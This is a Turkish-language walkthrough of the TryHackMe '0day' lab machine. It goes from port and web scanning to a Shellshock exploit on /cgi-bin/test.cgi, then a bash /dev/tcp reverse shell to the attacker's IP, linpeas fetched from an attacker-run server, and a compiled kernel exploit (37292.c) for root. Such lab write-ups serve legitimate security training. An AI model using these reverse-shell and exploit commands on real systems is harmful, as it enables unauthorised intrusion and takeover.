Merhaba! Bu yazıda, TryHackMe 0day Makine Çözümü nü adım adım birlikte gerçekleştireceğiz. Eğer siber güvenlik alanında pratik yapmak ve bilgi seviyenizi artırmak istiyorsanız, bu rehber tam size göre!
- Makine İsmi: 0day
- Zorluğu: Orta
- Makine Oda Linki: 0day Oda Linki
1- İlk adımda, Rustscan aracıyla hedef sistemde açık portları tespit ediyoruz. Bu araç, hızlı tarama performansıyla bilinir.
Açık portlar: 22 ve 80
Alternatif olarak şu komutu kullanabilirsiniz:
nmap -sS -sV -sC -Pn hedef makine adresi olarak tarayabilirsiniz. Rustscan aracı hızlı ve etkili olması ile öne çıkıyor.
2- Gobuster ile tarama yaparak çeşitli dizinler tespit ettik ancak işe yarar bir içerik bulamadık. Ardından Nikto ile daha detaylı bir web sunucusu analizi yaptık
3- Nikto taramasında, /cgi-bin/test.cgi
dizininde Shellshock açığı bulundu. Bu açık, eski Apache sunucularında kritik bir zafiyet olarak bilinir. Şimdi bunu kullanarak sisteme erişim sağlamaya çalışacağız.
4- Searchsploit içerisinden detaylı araştıyorum ve 1 tane python ile yazılmış exploit buluyoruz.
searchsploit -m linux/remote/34900.py indiriyoruz.
İlginizi çekebilecek yazımız: Bilgisayar Korsanları MacOS Kullanıcılarına Siber Saldırılar Düzenliyor
5- python3 34900.py payload=reverse rhost=hedefmakineipadresi lhost=kendivpnlocalipadresiniz lport=9001 && ncat -lvnp 9001 olarak dinleme başlıyoruz.
&& ncat -lvnp 9001 yaparak daha pratik kullanım sağlayabilirsiniz. Tek terminal de hem aracı çalıştırdık hem de geri bağlantıyı elde etmiş olduk.
Sorguladığımızda www-data olarak makindeyiz, şimdi shell ile direkt farklı terminal içerisine geçiş yaparak bash olarak kullanacağız.
6- ncat -lvnp 4444 diyerek diğer dinlemeyi de başlattık.
7- bash -i >& /dev/tcp/vpnipadresiniz/4444 0>&1 olarak onayladığımızda diğer ncat içerisine bağlantı gidecektir.
8- Bağlantı geldi ve cat /home/ryan/user.txt yaparak ilk bayrağı tespit etmiş olduk.
Şimdi Linpeas.sh ile yetki yükseltmek için yollar arayacağız.
9- Öncelikle python3 -m http.server 80 yazarak kendi makinemizde http serverı etkinleştirdik.
10- Direkt Buraya Tıklayarak İndirin makinemize Masaüstüne Linpeas.sh indiriyoruz.
- cd /tmp/
- wget localipadresiniz/linpeas.sh
- chmod +x linpeas.sh
- ./linpeas.sh yaparak araştırma yapmaya başladık.
11- Baktığımızda Linux sunucusunda çok eski bir versiyon olduğunu tespit etti. Google’da aratarak uygun exploit arıyorum.
12- Evet bir tane yetki yükseltmek için yazılmış exploit bulduk. Tıklayarak masaüstüne indiriyoruz.
13- Sırasıyla;
- wget localipadresiniz/37292.c olarak makineye indirdik
- export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin
- gcc 37292.c -o exploit.
- ./exploit
artık root içerisindeyiz.
14- Root içerisindeyiz. cat /root/root.txt diyerek ikinci bayrağı da aldık, makinemizin sonuna gelmiş bulunuyoruz.
Tryhackme 0day Makine Çözümü sonuna geldik, yeni yazılarda görüşmek üzere sağlıcakla kalın…